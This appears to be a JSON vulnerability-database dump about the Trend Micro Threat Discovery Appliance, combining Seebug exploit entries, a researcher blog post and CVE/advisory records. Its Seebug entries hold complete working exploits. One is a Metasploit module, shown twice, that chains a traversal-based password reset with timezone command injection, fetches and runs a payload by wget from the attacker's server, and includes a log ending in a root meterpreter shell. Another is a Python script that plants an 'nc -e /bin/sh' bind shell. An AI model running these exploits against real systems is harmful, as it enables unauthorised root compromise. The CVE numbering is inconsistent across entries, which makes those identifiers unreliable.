print_status(\"Waiting for the reboot...\")\r\n pwn_after_reboot\r\n end\r\n else\r\n if do_login\r\n pwn\r\n else\r\n fail_with(Failure::NoAccess, \"Authentication failed\")\r\n end\r\n end\r\n 
end\r\n\r\n def reset_password\r\n c = \"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logoff.cgi'),\r\n 'method' => 'GET',\r\n 'cookie' => c,\r\n })\r\n\r\n if res and res.code == 200 and res.headers.to_s =~ /Backtrace/\r\n return true\r\n end\r\n return false\r\n end\r\n\r\n def pwn\r\n start_http_server\r\n print_good(\"Logged in\")\r\n download_exec\r\n end\r\n\r\n def pwn_after_reboot\r\n @rebooted = false\r\n while !@rebooted\r\n if do_login\r\n @rebooted = true\r\n pwn\r\n end\r\n end\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n if (not @pl)\r\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\r\n return\r\n end\r\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\r\n @elf_sent = true\r\n send_response(cli, @pl)\r\n end\r\n\r\n def start_http_server\r\n @pl = generate_payload_exe\r\n @elf_sent = false\r\n\r\n downfile = rand_text_alpha(8+rand(8))\r\n resource_uri = '/' + downfile\r\n\r\n # do not use SSL for the attacking web server\r\n if datastore['SSL']\r\n ssl_restore = true\r\n datastore['SSL'] = false\r\n end\r\n\r\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\r\n srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)\r\n else\r\n srv_host = datastore['SRVHOST']\r\n end\r\n\r\n @service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri\r\n service_url_payload = srv_host + resource_uri\r\n\r\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\")\r\n start_service({'Uri' => {\r\n 'Proc' => Proc.new { |cli, req|\r\n on_request_uri(cli, req)\r\n },\r\n 'Path' => resource_uri\r\n }})\r\n\r\n datastore['SSL'] = true if ssl_restore\r\n connect\r\n end\r\n\r\n def exec(cmd)\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/admin_sys_time.cgi'),\r\n 
'cookie' => @cookie,\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'act' => 'save',\r\n 'timezone' => cmd,\r\n }\r\n }, 1)\r\n end\r\n\r\n def download_exec\r\n @bd = rand_text_alpha(8+rand(8))\r\n register_file_for_cleanup(\"/tmp/#{@bd}\")\r\n exec(\"|`wget #{@service_url} -O /tmp/#{@bd}`\")\r\n exec(\"|`chmod 755 /tmp/#{@bd}`\")\r\n exec(\"|`/tmp/#{@bd}`\")\r\n\r\n # we need to delay, for the stager\r\n select(nil, nil, nil, 5)\r\n end\r\n\r\n def do_login\r\n\r\n begin\r\n login = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logon.cgi'),\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'passwd' => datastore['PASSWORD'],\r\n 'isCookieEnable' => 1,\r\n }\r\n })\r\n\r\n # these are needed due to the reboot\r\n rescue Rex::ConnectionRefused\r\n return false\r\n rescue Rex::ConnectionTimeout\r\n return false\r\n end\r\n if login and login.code == 200 and login.body =~ /frame\\.cgi/\r\n @cookie = \"session_id=#{$1};\" if login.get_cookies =~ /session_id=(.*);/\r\n return true\r\n end\r\n return false\r\n end\r\nend\r\n=begin\r\nsaturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/trend.rc \r\n[*] Processing scripts/trend.rc for ERB directives.\r\nresource (scripts/trend.rc)> use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi\r\nresource (scripts/trend.rc)> set RHOST 192.168.100.2\r\nRHOST => 192.168.100.2\r\nresource (scripts/trend.rc)> set payload linux/x86/meterpreter/reverse_tcp\r\npayload => linux/x86/meterpreter/reverse_tcp\r\nresource (scripts/trend.rc)> set LHOST 192.168.100.13\r\nLHOST => 192.168.100.13\r\nresource (scripts/trend.rc)> exploit\r\n[*] Exploit running as background job.\r\n[*] Started reverse TCP handler on 192.168.100.13:4444 \r\n[*] Bypassing authentication...\r\nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > \r\n[+] The password has been reset!\r\n[*] Waiting for the reboot...\r\n[*] 192.168.100.2:443 - Starting up our web service on 
http://192.168.100.13:1337/nnDBuOUMuKnxP ...\r\n[*] Using URL: http://0.0.0.0:1337/nnDBuOUMuKnxP\r\n[*] Local IP: http://192.168.100.13:1337/nnDBuOUMuKnxP\r\n[+] Logged in\r\n[*] 192.168.100.2:443 - Sending the payload to the server...\r\n[*] Transmitting intermediate stager for over-sized stage...(105 bytes)\r\n[*] Sending stage (1495599 bytes) to 192.168.100.2\r\n[*] Meterpreter session 1 opened (192.168.100.13:4444 -> 192.168.100.2:46140) at 2016-09-23 14:59:08 -0500\r\n[+] Deleted /tmp/rpNDXQZTB\r\n[*] Server stopped.\r\nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > sessions -i 1\r\n[*] Starting interaction with 1...\r\nmeterpreter > shell\r\nProcess 3846 created.\r\nChannel 1 created.\r\nBusyBox v1.00 (2010.10.13-06:52+0000) Built-in shell (ash)\r\nEnter 'help' for a list of built-in commands.\r\n/bin/sh: can't access tty; job control turned off\r\n/opt/TrendMicro/MinorityReport/www/cgi-bin # id\r\nid\r\nuid=0(root) gid=0(root)\r\n/opt/TrendMicro/MinorityReport/www/cgi-bin #\r\n=end\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92940"}, {"lastseen": "2017-11-19T11:59:30", "description": "Summary:\r\n\r\n\r\nThere exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root.\r\n\r\nNotes:\r\n\r\n\r\n- Since this is a busybox, getting a connectback seemed hard. 
So, for this particular PoC, all I did was \r\nexec a bind shell using netcat. Note that this leaves an unauthenticated root shell listening on TCP port 1337 of the appliance (see the `nc -e /bin/sh -lp 1337` payload below) that anyone able to reach the appliance can connect to, so only run it against lab systems and kill the listener afterwards.\r\n- Auth is VERY weak, no privilege separation, no username required, no password policy, no protection from brute-force attempts...\r\n- Auth is now bypassed, please see CVE-2016-7552\r\n\r\nExample:\r\n\r\n```\r\nsaturn:trend_micro_threat_discovery_log_query_dlp_rce mr_me$ ./poc.py \r\n(+) usage: ./poc.py <target> <pass>\r\n(+) eg: ./poc.py 172.16.175.123 admin123\r\nsaturn:trend_micro_threat_discovery_log_query_dlp_rce mr_me$ ./poc.py 172.16.175.123 admin\r\n(+) logged in...\r\n(+) starting backdoor, this will take a few secs...\r\n(+) calling backdoor!\r\nid\r\nuid=0(root) gid=0(root)\r\nuname -a\r\nLinux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown\r\nexit\r\n```", "cvss3": {}, "published": "2017-04-21T00:00:00", "type": "seebug", "title": "Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dlp.cgi Command Injection Remote Code Execution Vulnerability (CVE-2016-8590)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7552", "CVE-2016-8590"], "modified": "2017-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92986", "id": "SSV:92986", "sourceData": "\n import re\r\nimport os\r\nimport sys\r\nimport time\r\nimport requests\r\nimport threading\r\n\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nif len(sys.argv) != 3:\r\n print \"(+) usage: %s <target> <pass>\" % sys.argv[0]\r\n print \"(+) eg: %s 172.16.175.123 admin123\" % sys.argv[0]\r\n sys.exit(-1)\r\n\r\nt = sys.argv[1]\r\np = sys.argv[2]\r\n\r\nbu = \"https://%s/\" % t\r\nl_url = \"%scgi-bin/logon.cgi\" % bu\r\ne_url = \"%scgi-bin/log_query_dlp.cgi\" % bu\r\n\r\ns = requests.Session()\r\n\r\ndef exec_bd(s, e_url):\r\n # now we setup our backdoor\r\n # no reverse, since it seems to fail !?\r\n netcat = \"test|`nc -e /bin/sh -lp 1337`\"\r\n e_url += \"?act=search_advanced&cache_id=%s\" % netcat\r\n s.get(e_url, verify=False)\r\n\r\n# first we login...\r\nr = 
s.post(l_url, data={ \"passwd\":p, \"isCookieEnable\":1 }, verify=False)\r\nif \"frame.cgi\" in r.text:\r\n print \"(+) logged in...\"\r\n\r\n thread = threading.Thread(target=exec_bd, args=(s, e_url,))\r\n thread.start()\r\n\r\n print \"(+) starting backdoor, this will take a few secs...\"\r\n time.sleep(4)\r\n\r\n print \"(+) calling backdoor!\"\r\n os.system(\"nc %s 1337\" % t)\r\n\r\nelse:\r\n print \"(-) login failed\"\r\n sys.exit(-1)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92986", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T11:59:43", "description": "In the last few months, I have been testing several Trend Micro products with Steven Seeley ([@steventseeley](https://twitter.com/steventseeley)). Together, we have found more than 200+ RCE (Remote Code Execution) vulnerabilities and for the first time we presented the outcome of our research at [Hack In The Box 2017 Amsterdam](https://conference.hitb.org/hitbsecconf2017ams/sessions/trending-a-micro-line-how-we-found-over-100-rce-vulnerabilities-in-trend-micro-software/)\u00a0in April.\r\n\r\nThe presentation is available as a [PDF](http://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Steven%20Seeley%20and%20Roberto%20Suggi%20Liverani%20-%20I%20Got%2099%20Trends%20and%20a%20%23%20Is%20All%20Of%20Them.pdf) or as a [Slideshare](https://www.slideshare.net/robertosl81/i-got-99-trends-and-a-is-all-of-them).\r\n\r\n<iframe allowfullscreen=\"\" frameborder=\"0\" height=\"470px\" marginheight=\"0\" marginwidth=\"0\" mozallowfullscreen=\"\" scrolling=\"no\" src=\"https://www.slideshare.net/robertosl81/slideshelf\" style=\"border: none;\" webkitallowfullscreen=\"\" width=\"615px\"></iframe>\r\nSince it was not possible to cover all discovered vulnerabilities with a single presentation, this blog post will cover and analyze a further vulnerability that did not make it to the slides, and which affects the Trend Micro 
Threat Discovery Appliance (TDA) product.\r\n\r\n**CVE-2016-8584 - TDA Session Generation Authentication Bypass**\r\n\r\nThis was an interesting vulnerability, discovered after observing that two consecutive login attempts against the web interface returned the same session_id token. Following this observation, our inference was that a time factor played a role. After further analysis and reversing of the TDA libraries, the session management was found to be defined in the following library: /opt/TrendMicro/MinorityReport/lib/mini_httpd/utils.so\r\n\r\nWithin this library, the create_session() function is of particular interest, as shown below.\r\n\r\n\r\n\r\n\r\n\r\nThis function performs the following actions:\r\n\r\n- Gets the current time\r\n- Uses the time as the \u201cseed\u201d\r\n- Calls srand() with the above seed\r\n- MD5-hashes the result\r\n\r\nAll these steps can be shortened to the following: _session_id = md5(srand(get_curtime()))_\r\n\r\nThe vulnerability is that the seed is predictable: it is derived from the current time rather than from a cryptographically secure random source, so an attacker who knows approximately when a session was created can regenerate the session IDs issued in that window and try them.\r\n\r\nHowever, there are two conditions which affect exploitation of this vulnerability:\r\n\r\n1) A legitimate user has to be authenticated - a session token is associated with an IP address when a user logs in\r\n2) The attacker needs to perform the attack from the same IP address as the legitimate user\r\n\r\nThe second condition is not an issue in a NATed environment (where attacker and victim share a source address), but in any other environment it is definitely the most significant constraint.\r\n\r\nA further conclusion is that although the attacker is technically able to predict \"future\" session_id tokens, there is no point in doing so, since condition (1) has to be met first and an association between an IP address and session_id has to exist in the database.\r\n\r\nThe exploit Proof-of-Concept (poc) has been published [here](https://gist.github.com/malerisch/0b8ecfcb03a2c2f26e5f649cf1df8d33) and below a video showing the attack in 
action:\r\n\r\nhttps://www.youtube.com/embed/rwmfbvvGHDw\r\n\r\nThe exploits for all the other TDA vulnerabilities that were discovered as part of this research can be found below:\r\n\r\n[CVE-2016-8584 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) Session Generation Authentication Bypass Vulnerability](https://gist.github.com/malerisch/0b8ecfcb03a2c2f26e5f649cf1df8d33)\r\n\r\n[CVE-2016-7547 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Information Disclosure Vulnerability](https://gist.github.com/malerisch/b8764501d299f2ec9eb145258d404e5f)\r\n\r\n[CVE-2016-7552 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability](https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4)\r\n\r\n[CVE-2016-8585 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 admin_sys_time.cgi Command Injection Remote Code Execution Vulnerability](https://gist.github.com/malerisch/91239147d4fceffa63006974889ef1af)\r\n\r\n[CVE-2016-8586 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 detected_potential_files.cgi Command Injection Remote Code Execution Vulnerability](https://gist.github.com/malerisch/97c160aa4e8219c7c9ad25107444a280)\r\n\r\n[CVE-2016-8587 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Remote Code Execution Vulnerability](https://gist.github.com/malerisch/aac1ad3e6f3bfd70b35ba6538ecbff23)\r\n\r\n[CVE-2016-8588 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 hotfix_upload.cgi Command Injection Remote Code Execution Vulnerability](https://gist.github.com/malerisch/93be2141dfc5709159468762937f2853)\r\n\r\n[CVE-2016-8589 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dae.cgi Command Injection Remote Code Execution Vulnerability](https://gist.github.com/malerisch/3bbb6d0b235fa5af2ba6f05826fe3846)\r\n\r\n[CVE-2016-8590 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dlp.cgi Command 
Injection Remote Code Execution Vulnerability](https://gist.github.com/malerisch/7b84a4bd6eee0a3a591677f421653a2e)\r\n\r\n[CVE-2016-8591 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) log_query.cgi Command Injection Remote Code Execution Vulnerability](https://gist.github.com/malerisch/5dd838a723b342bb04121f29a8333e00)\r\n\r\n[CVE-2016-8592 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) log_query_system.cgi Command Injection Remote Code Execution Vulnerability](https://gist.github.com/malerisch/0c78e49124561524fd59d6635007eefd)\r\n\r\n[CVE-2016-8593 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) upload.cgi Remote Code Execution Vulnerability](https://gist.github.com/malerisch/c59ab650c8e226ef22cdfbfeeee6d4ec)\r\n\r\nA Metasploit module has been developed and added to the master branch:\r\n\r\n[https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb)", "published": "2017-04-20T00:00:00", "type": "seebug", "title": "Trend Micro Threat Discovery Appliance - Session Generation Authentication Bypass (CVE-2016-8584)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7547", "CVE-2016-7552", "CVE-2016-8584", "CVE-2016-8585", "CVE-2016-8586", "CVE-2016-8587", "CVE-2016-8588", "CVE-2016-8589", "CVE-2016-8590", "CVE-2016-8591", "CVE-2016-8592", "CVE-2016-8593"], "modified": "2017-04-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92978", "id": "SSV:92978", "sourceData": "\n ##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include 
Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution',\r\n 'Description' => %q{\r\n This module exploits two vulnerabilities in the Trend Micro Threat Discovery Appliance.\r\n The first is an authentication bypass vulnerability via a file delete in logoff.cgi\r\n which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552).\r\n The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi\r\n interface (CVE-2016-7547; note that the researchers' own advisory list assigns the\r\n admin_sys_time.cgi command injection to CVE-2016-8585 and CVE-2016-7547 to the\r\n dlp_policy_upload.cgi information disclosure, so verify the identifier before reporting).\r\n Note: You have the option to use the authentication bypass or not since it requires\r\n that the server is rebooted. The password reset deletes the appliance's config file, which\r\n renders the existing authentication useless (nobody can log in until the box is rebooted),\r\n so it is disruptive to the target.\r\n Typically, if an administrator can't log in, they will bounce the box. Therefore, this\r\n module performs a heartbeat request until the box is bounced and then attempts to log in\r\n and to perform the command injection. 
This module has been tested on version 2.6.1062r1\r\n of the appliance.\r\n },\r\n 'Author' =>\r\n [\r\n 'mr_me <steventhomasseeley@gmail.com>', # vuln + msf\r\n 'Roberto Suggi Liverani @malerisch', # vuln + msf\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://asciinema.org/a/112480'], # demo\r\n [ 'CVE', '2016-7552'], # auth bypass\r\n [ 'CVE', '2016-7547'], # cmdi\r\n ],\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Trend Micro Threat Discovery Appliance 2.6.1062r1', {} ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Apr 10 2017'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptString.new('TARGETURI', [true, 'The target URI', '/']),\r\n OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']),\r\n OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),\r\n OptBool.new('AUTHBYPASS', [ true, 'Bypass the authentication', true ]),\r\n\r\n ], self.class)\r\n end\r\n\r\n def check\r\n if do_login\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/about.cgi'),\r\n 'cookie' => @cookie,\r\n 'method' => 'GET',\r\n }, 1)\r\n if res and res.code == 200 and res.body =~ /About Trend Micro/\r\n version = \"#{$1}\" if res.body =~ /var ver_str = new String\\(\"(.*)\"\\)/\r\n case version\r\n when /2.6.1062/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n end\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n if datastore['AUTHBYPASS']\r\n print_status(\"Bypassing authentication...\")\r\n if reset_password\r\n print_good(\"The password has been reset!\")\r\n print_status(\"Waiting for the administrator to reboot...\")\r\n pwn_after_reboot\r\n end\r\n else\r\n if do_login\r\n pwn\r\n else\r\n fail_with(Failure::NoAccess, \"Authentication failed\")\r\n 
end\r\n end\r\n end\r\n\r\n def reset_password\r\n c = \"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logoff.cgi'),\r\n 'method' => 'GET',\r\n 'cookie' => c,\r\n })\r\n\r\n if res and res.code == 200 and res.headers.to_s =~ /Backtrace/\r\n return true\r\n end\r\n return false\r\n end\r\n\r\n def pwn\r\n start_http_server\r\n print_good(\"Logged in\")\r\n download_exec\r\n end\r\n\r\n def pwn_after_reboot\r\n @rebooted = false\r\n while !@rebooted\r\n if do_login\r\n @rebooted = true\r\n pwn\r\n end\r\n end\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n if (not @pl)\r\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\r\n return\r\n end\r\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\r\n @elf_sent = true\r\n send_response(cli, @pl)\r\n end\r\n\r\n def start_http_server\r\n @pl = generate_payload_exe\r\n @elf_sent = false\r\n\r\n downfile = rand_text_alpha(8+rand(8))\r\n resource_uri = '/' + downfile\r\n\r\n # do not use SSL for the attacking web server\r\n if datastore['SSL']\r\n ssl_restore = true\r\n datastore['SSL'] = false\r\n end\r\n\r\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\r\n srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)\r\n else\r\n srv_host = datastore['SRVHOST']\r\n end\r\n\r\n @service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri\r\n service_url_payload = srv_host + resource_uri\r\n\r\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\")\r\n start_service({'Uri' => {\r\n 'Proc' => Proc.new { |cli, req|\r\n on_request_uri(cli, req)\r\n },\r\n 'Path' => resource_uri\r\n }})\r\n\r\n datastore['SSL'] = true if ssl_restore\r\n connect\r\n end\r\n\r\n def exec(cmd)\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 
'cgi-bin/admin_sys_time.cgi'),\r\n 'cookie' => @cookie,\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'act' => 'save',\r\n 'timezone' => cmd,\r\n }\r\n }, 1)\r\n end\r\n\r\n def download_exec\r\n @bd = rand_text_alpha(8+rand(8))\r\n register_file_for_cleanup(\"/tmp/#{@bd}\")\r\n exec(\"|`wget #{@service_url} -O /tmp/#{@bd}`\")\r\n exec(\"|`chmod 755 /tmp/#{@bd}`\")\r\n exec(\"|`/tmp/#{@bd}`\")\r\n\r\n # we need to delay, for the stager\r\n select(nil, nil, nil, 5)\r\n end\r\n\r\n def do_login\r\n\r\n begin\r\n login = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logon.cgi'),\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'passwd' => datastore['PASSWORD'],\r\n 'isCookieEnable' => 1,\r\n }\r\n })\r\n\r\n # these are needed due to the reboot\r\n rescue Rex::ConnectionRefused\r\n return false\r\n rescue Rex::ConnectionTimeout\r\n return false\r\n end\r\n if login and login.code == 200 and login.body =~ /frame\\.cgi/\r\n @cookie = \"session_id=#{$1};\" if login.get_cookies =~ /session_id=(.*);/\r\n return true\r\n end\r\n return false\r\n end\r\nend\r\n=begin\r\nsaturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/trend.rc \r\n[*] Processing scripts/trend.rc for ERB directives.\r\nresource (scripts/trend.rc)> use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi\r\nresource (scripts/trend.rc)> set RHOST 192.168.100.2\r\nRHOST => 192.168.100.2\r\nresource (scripts/trend.rc)> set payload linux/x86/meterpreter/reverse_tcp\r\npayload => linux/x86/meterpreter/reverse_tcp\r\nresource (scripts/trend.rc)> set LHOST 192.168.100.13\r\nLHOST => 192.168.100.13\r\nresource (scripts/trend.rc)> exploit\r\n[*] Exploit running as background job.\r\n[*] Started reverse TCP handler on 192.168.100.13:4444 \r\n[*] Bypassing authentication...\r\nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > \r\n[+] The password has been reset!\r\n[*] Waiting for the reboot...\r\n[*] 192.168.100.2:443 - Starting up our web service on 
http://192.168.100.13:1337/nnDBuOUMuKnxP ...\r\n[*] Using URL: http://0.0.0.0:1337/nnDBuOUMuKnxP\r\n[*] Local IP: http://192.168.100.13:1337/nnDBuOUMuKnxP\r\n[+] Logged in\r\n[*] 192.168.100.2:443 - Sending the payload to the server...\r\n[*] Transmitting intermediate stager for over-sized stage...(105 bytes)\r\n[*] Sending stage (1495599 bytes) to 192.168.100.2\r\n[*] Meterpreter session 1 opened (192.168.100.13:4444 -> 192.168.100.2:46140) at 2016-09-23 14:59:08 -0500\r\n[+] Deleted /tmp/rpNDXQZTB\r\n[*] Server stopped.\r\nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > sessions -i 1\r\n[*] Starting interaction with 1...\r\nmeterpreter > shell\r\nProcess 3846 created.\r\nChannel 1 created.\r\nBusyBox v1.00 (2010.10.13-06:52+0000) Built-in shell (ash)\r\nEnter 'help' for a list of built-in commands.\r\n/bin/sh: can't access tty; job control turned off\r\n/opt/TrendMicro/MinorityReport/www/cgi-bin # id\r\nid\r\nuid=0(root) gid=0(root)\r\n/opt/TrendMicro/MinorityReport/www/cgi-bin #\r\n=end\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92978", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2022-02-09T20:01:50", "description": "An authentication bypass vulnerability exists in TrendMicro Threat Discovery Appliance. 
Successful exploitation of this vulnerability would allow remote attackers to gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-12-22T00:00:00", "type": "checkpoint_advisories", "title": "Trendmicro Threat Discovery Appliance Directory Traversal (CVE-2016-7552)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7552"], "modified": "2020-12-22T00:00:00", "id": "CPAI-2016-1038", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T15:19:38", "description": "On the Trend Micro Threat Discovery Appliance 2.6.1062r1, directory traversal when processing a session_id cookie allows a remote, unauthenticated attacker to delete arbitrary files as root. 
This can be used to bypass authentication or cause a DoS.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-12T10:59:00", "type": "cve", "title": "CVE-2016-7552", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7552"], "modified": "2017-04-17T15:43:00", "cpe": ["cpe:/a:trendmicro:threat_discovery_appliance:2.6.1062"], "id": "CVE-2016-7552", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7552", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:55:23", "description": "log_query_dae.cgi in Trend Micro Threat Discovery Appliance 2.6.1062r1 and earlier allows remote authenticated users to execute arbitrary code as the root user via shell metacharacters in the cache_id parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", 
